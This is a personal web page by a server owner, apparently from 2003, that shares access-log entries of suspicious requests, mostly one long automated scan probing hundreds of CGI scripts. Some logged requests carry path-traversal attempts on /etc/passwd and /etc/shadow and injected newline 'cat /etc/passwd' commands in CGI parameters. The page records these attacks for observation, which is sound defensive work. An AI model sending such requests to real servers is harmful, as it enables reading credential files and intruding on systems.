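I have been watching the suspicious accesses made against my own web server! Naturally, anything that would be inconvenient to show is kept private, so please bear with me. I also made a simple log viewer. See here.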
210.142.44.xx - - [12/Jul/2003:18:21:27 +0900] "GET /NULL.IDA?[... long encoded payload omitted ...] HTTP/1.1" 400 376
This is a type I have confirmed for the first time. A single line is extremely long. Several of these arrived in succession.

61.177.220.xxx - - [28/Mar/2003:17:04:47 +0900] "OPTIONS * HTTP/1.0" 200 -
219.242.81.xxx - - [08/Apr/2003:17:23:51 +0900] "OPTIONS * HTTP/1.0" 200 -
Was this aimed at some security hole, or was it probing for something?

211.91.254.xxx - - [10/Apr/2003:20:57:24 +0900] "GET / HTTP/1.1" 200 6471
211.91.254.xxx - - [10/Apr/2003:20:57:24 +0900] "HEAD /qweiop43809442fsfjflr.html HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:25 +0900] "GET / HTTP/1.1" 200 6471
211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /ifx/?LO=../../../etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /../../etc/passwd HTTP/1.1" 400 0
211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /../../../../../etc/passwd HTTP/1.1" 400 0
211.91.254.xxx - - [10/Apr/2003:20:57:26 +0900] "HEAD /../../../etc/passwd HTTP/1.1" 400 0
211.91.254.xxx - - [10/Apr/2003:20:57:30 +0900] "HEAD /../../passwd HTTP/1.1" 400 0
211.91.254.xxx - - [10/Apr/2003:20:57:40 +0900] "HEAD /../../shadow HTTP/1.1" 400 0
211.91.254.xxx - - [10/Apr/2003:20:57:40 +0900] "HEAD /../../passwd HTTP/1.1" 400 0
211.91.254.xxx - - [10/Apr/2003:20:57:47 +0900] "HEAD /cgi/ HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:48 +0900] "HEAD /admin-serv/config/admpw HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:48 +0900] "HEAD /admin-serv/config/admpw HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:49 +0900] "HEAD /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:53 +0900] "HEAD /whois_raw.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:56 +0900] "HEAD /web_store.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:58 +0900] "OPTIONS / HTTP/1.1" 200 -
211.91.254.xxx - - [10/Apr/2003:20:57:58 +0900] "HEAD /whois_raw.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:59 +0900] "HEAD /usr/local/apache/share/htdocs/.htaccess HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:57:59 +0900] "HEAD /userreg.cgi?cmd=insert=eng&tnum=3&fld1=test999%0acat>/etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:00 +0900] "HEAD /userreg.cgi?cmd=insert=eng&tnum=3&fld1=test999%0acat>/etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:01 +0900] "HEAD /root HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:02 +0900] "HEAD /pw/storemgr.pw HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:05 +0900] "HEAD /pw/storemgr.pw HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:05 +0900] "GET /NULL.printer HTTP/1.1" 404 295
211.91.254.xxx - - [10/Apr/2003:20:58:09 +0900] "HEAD /publisher/ HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:09 +0900] "HEAD /PSUser/PSCOErrPage.htm HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:19 +0900] "HEAD /piranha/secure/passwd.php3 HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:23 +0900] "HEAD /ping HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:24 +0900] "HEAD /photoads/cgi-bin/env.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:24 +0900] "HEAD /photoads/ads_data.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:27 +0900] "HEAD /pfdispaly.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:29 +0900] "HEAD /PDG_Cart/shopper.conf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:44 +0900] "HEAD /PDG_Cart/shopper.conf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:51 +0900] "HEAD /orders/orders.txt HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:52 +0900] "HEAD /Orders/order.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:52 +0900] "HEAD /Orders/order.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:54 +0900] "HEAD /orders/order.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:54 +0900] "HEAD /orders/mountain.cfg HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:58:59 +0900] "HEAD /PDG_Cart/order.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:05 +0900] "HEAD /orders/checks.txt HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:13 +0900] "HEAD /orders/checks.txt HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:13 +0900] "HEAD /null.htw HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:14 +0900] "HEAD /null.htw HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:15 +0900] "HEAD /ncl_items.html HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:18 +0900] "HEAD /names.nsf/Open HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:19 +0900] "HEAD /names.nsf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:20 +0900] "HEAD /manage/cgi/cgiproc HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:21 +0900] "HEAD /mall_log_files/order.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:21 +0900] "HEAD /mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:22 +0900] "HEAD /logs HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:23 +0900] "HEAD /logs HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:31 +0900] "HEAD /log.nsf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:32 +0900] "HEAD /log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:32 +0900] "HEAD /log.nsf/ HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:43 +0900] "HEAD /ews/ews/architext_query.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:49 +0900] "HEAD /ews/ews/architext_query.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:20:59:57 +0900] "HEAD /domlog.nsf/ HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:03 +0900] "HEAD /domlog.nsf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:23 +0900] "HEAD /domcfg.nsf/ HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:23 +0900] "HEAD /domcfg.nsf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:23 +0900] "HEAD /domcfg.nsf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:27 +0900] "HEAD /database.nsf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:34 +0900] "HEAD /cool-logs/mylog.html HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:41 +0900] "HEAD /cool-logs/mlog.html HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:46 +0900] "HEAD /cgi-src HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:48 +0900] "HEAD /cgi-bin/zsh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:49 +0900] "HEAD /cgi-local HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:51 +0900] "HEAD /cgi-bin/www-sql HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:52 +0900] "HEAD /cgi-bin/wwwboard.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:00:53 +0900] "HEAD /cgi-bin/wwwboard.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:07 +0900] "HEAD /cgi-bin/wwwadmin.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:09 +0900] "HEAD /cgi-bin/wwwadmin.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:15 +0900] "HEAD /cgi-bin/wrap.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:29 +0900] "HEAD /cgi-bin/wrap HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:41 +0900] "HEAD /cgi-Bin/wrap HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:41 +0900] "HEAD /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:55 +0900] "HEAD /cgi-bin/webwho.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:01:56 +0900] "HEAD /cgi-bin/webwho.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:03 +0900] "HEAD /cgi-bin/websendmail HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:06 +0900] "HEAD /cgi-bin/webmap.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:11 +0900] "HEAD /cgi-bin/webgais HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:12 +0900] "HEAD /Cgi-Bin/webdist.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:14 +0900] "HEAD /Cgi-Bin/webdist.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:19 +0900] "HEAD /cgi-bin/webdist.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:19 +0900] "HEAD /cgi-bin/webbbs.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:23 +0900] "HEAD /cgi-bin/w3tvars.pm HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:23 +0900] "HEAD /cgi-bin/w3-msql/ HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:23 +0900] "HEAD /cgi-bin/w3tvars.pm HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:38 +0900] "HEAD /cgi-bin/w3-msql HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:48 +0900] "HEAD /Cgi-Bin/view-source HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:52 +0900] "HEAD /Cgi-Bin/view-source HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:52 +0900] "HEAD /cgi-bin/userfile.dat HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:54 +0900] "HEAD /cgi-bin/user.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:55 +0900] "HEAD /cgi-bin/user.dat HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:57 +0900] "HEAD /cgi-bin/uptime HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:58 +0900] "HEAD /cgi-bin/upload.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:02:58 +0900] "HEAD /cgi-bin/upload.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:01 +0900] "HEAD /cgi-bin/unlg1.1 HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:09 +0900] "HEAD /cgi-bin/UltraBoard.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:10 +0900] "HEAD /cgi-bin/UltraBoard.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:12 +0900] "HEAD /cgi-bin/tpgnrock HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:13 +0900] "HEAD /cgi-bin/textcounter.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:14 +0900] "HEAD /cgi-bin/textcounter.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:19 +0900] "HEAD /cgi-bin/test-cgi?* HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:20 +0900] "HEAD /Cgi-Bin/test-cgi/* HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:32 +0900] "HEAD /cgi-bin/test-cgi.tcl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:34 +0900] "HEAD /Cgi-Bin/testcgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:36 +0900] "HEAD /cgi-bin/test-cgi.tcl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:37 +0900] "HEAD /cgi-bin/tcsh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:40 +0900] "HEAD /Cgi-Bin/tcsh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:41 +0900] "HEAD /cgi-bin/survey.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:41 +0900] "HEAD /cgi-bin/survey.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:03:45 +0900] "HEAD /Cgi-Bin/test.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:01 +0900] "HEAD /cgi-bin/status.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:03 +0900] "HEAD /cgi-bin/status.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:12 +0900] "HEAD /cgi-bin/shop.cgi?page=../../../../etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /cgi-bin/shop.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /cgi-bin/shop.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /Cgi-Bin/sojourn.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:14 +0900] "HEAD /cgi-bin/sh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:19 +0900] "HEAD /cgi-bin/settings.cfg HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:21 +0900] "HEAD /Cgi-Bin/search.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:22 +0900] "HEAD /Cgi-Bin/search.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:24 +0900] "HEAD /cgi-bin/search.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:28 +0900] "HEAD /cgi-bin/settings.cfg HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:34 +0900] "HEAD /cgi-bin/rwwwshell.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:35 +0900] "HEAD /cgi-bin/rsh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:35 +0900] "HEAD /cgi-bin/rpm_query HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:41 +0900] "HEAD /cgi-bin/rksh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:52 +0900] "HEAD /cgi-bin/responder.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:54 +0900] "HEAD /cgi-bin/responder HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:54 +0900] "HEAD /cgi-bin/redirect HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:56 +0900] "HEAD /cgi-bin/process_bug.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:57 +0900] "HEAD /cgi-bin/printenv HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:57 +0900] "HEAD /cgi-bin/post-query HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:04:59 +0900] "HEAD /cgi-bin/query HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:07 +0900] "HEAD /cgi-bin/postcard.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:08 +0900] "HEAD /cgi-bin/plusmail HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:08 +0900] "HEAD /cgi-bin/plusmail HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:15 +0900] "HEAD /cgi-bin/phpscan HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:16 +0900] "HEAD /cgi-bin/php.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:28 +0900] "HEAD /cgi-bin/php HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:32 +0900] "HEAD /cgi-bin/phf.pp HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:37 +0900] "HEAD /Cgi-Bin/phf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:38 +0900] "HEAD /cgi-bin/phf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:47 +0900] "HEAD /Cgi-Bin/phf HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:47 +0900] "HEAD /cgi-bin/phf.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:50 +0900] "HEAD /cgi-bin/pfdisplay HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:53 +0900] "HEAD /cgi-bin/pfdisplay HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:53 +0900] "HEAD /cgi-bin/perlshop.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:05:58 +0900] "HEAD /cgi-bin/perl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:01 +0900] "HEAD /cgi-bin/password.txt HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password.log HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password.dat HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:04 +0900] "HEAD /cgi-bin/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:14 +0900] "HEAD /cgi-bin/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:15 +0900] "HEAD /Cgi-Bin/nph-test-cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:16 +0900] "HEAD /cgi-bin/nph-test-cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:21 +0900] "HEAD /cgi-bin/nph-error.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:34 +0900] "HEAD /cgi-bin/nlog-smb.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:34 +0900] "HEAD /cgi-bin/nlog-smb.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:42 +0900] "HEAD /cgi-bin/mylog.phtml HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:50 +0900] "HEAD /cgi-bin/mlog.phtml HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:51 +0900] "HEAD /cgi-bin/mlog.phtml HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:06:56 +0900] "HEAD /cgi-bin/man.sh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:13 +0900] "HEAD /cgi-bin/maillist.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:31 +0900] "HEAD /cgi-bin/mail HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:36 +0900] "HEAD /cgi-bin/MachineInfo HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:39 +0900] "HEAD /cgi-bin/MachineInfo HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:42 +0900] "HEAD /cgi-bin/LWGate.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:45 +0900] "HEAD /cgi-bin/lwgate HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:48 +0900] "HEAD /cgi-bin/lwgate HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:58 +0900] "HEAD /Cgi-Bin/loadpage.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:07:59 +0900] "HEAD /Cgi-Bin/loadpage.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:16 +0900] "HEAD /Cgi-Bin/ksh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:35 +0900] "HEAD /cgi-bin/k HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:37 +0900] "HEAD /cgi-bin/k HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:40 +0900] "HEAD /cgi-bin/jj HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:48 +0900] "HEAD /Cgi-Bin/jj HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:49 +0900] "HEAD /cgi-bin/info2www HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:50 +0900] "HEAD /Cgi-Bin/htsearch HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:50 +0900] "HEAD /cgi-bin/htmlscript?../../../../etc/passwd HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:50 +0900] "HEAD /cgi-bin/htmlscript HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:52 +0900] "HEAD /cgi-bin/handler HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:53 +0900] "HEAD /cgi-bin/htsearch HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:08:53 +0900] "HEAD /cgi-bin/guestbook.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:00 +0900] "HEAD /cgi-bin/htmlscript HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:02 +0900] "HEAD /cgi-bin/guestbook.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:03 +0900] "HEAD /cgi-bin/guestbook HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:07 +0900] "HEAD /cgi-bin/guestbook HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:08 +0900] "HEAD /cgi-bin/glimpse HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:08 +0900] "HEAD /cgi-bin/gH.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:10 +0900] "HEAD /cgi-bin/fortune HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:10 +0900] "HEAD /cgi-bin/fortune HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:11 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:11 +0900] "HEAD /Cgi-Bin/formmail.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:13 +0900] "HEAD /Cgi-Bin/formmail HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:14 +0900] "HEAD /cgi-bin/FormHandler.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:16 +0900] "HEAD /cgi-bin/flexform.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:17 +0900] "HEAD /cgi-bin/flexform HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:17 +0900] "HEAD /cgi-bin/finger.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:17 +0900] "HEAD /Cgi-Bin/FormHandler.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:19 +0900] "HEAD /cgi-bin/finger.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:25 +0900] "HEAD /cgi-bin/finger.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:30 +0900] "HEAD /cgi-bin/files.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:31 +0900] "HEAD /cgi-bin/filemail.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:32 +0900] "HEAD /cgi-bin/filemail HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:34 +0900] "HEAD /cgi-bin/faxsurvey HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:35 +0900] "HEAD /Cgi-Bin/ezshopper/loadpage.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:35 +0900] "HEAD /cgi-bin/excite HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:36 +0900] "HEAD /cgi-bin/environ.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:36 +0900] "HEAD /Cgi-Bin/faxsurvey HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:43 +0900] "HEAD /Cgi-Bin/enivron.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:09:44 +0900] "HEAD /Cgi-Bin/ezshopper/search.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:12 +0900] "HEAD /Cgi-Bin/enivron.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:19 +0900] "HEAD /Cgi-Bin/echo.bat HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:48 +0900] "HEAD /cgi-bin/dumpenv.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:49 +0900] "HEAD /cgi-bin/download.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:49 +0900] "HEAD /cgi-bin/dnewsweb HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:50 +0900] "HEAD /cgi-bin/dig.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:10:51 +0900] "HEAD /cgi-bin/dig.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:04 +0900] "HEAD /cgi-bin/day5notifier HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:06 +0900] "HEAD /cgi-bin/day5datanotifier.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:08 +0900] "HEAD /cgi-bin/date HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:10 +0900] "HEAD /cgi-bin/csh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:10 +0900] "HEAD /cgi-bin/day5datacopier.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:14 +0900] "HEAD /Cgi-Bin/csh HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:17 +0900] "HEAD /cgi-bin/counterfiglet HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:18 +0900] "HEAD /cgi-bin/counterfiglet HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:21 +0900] "HEAD /cgi-bin/Count.cgi HTTP/1.1" 404 0
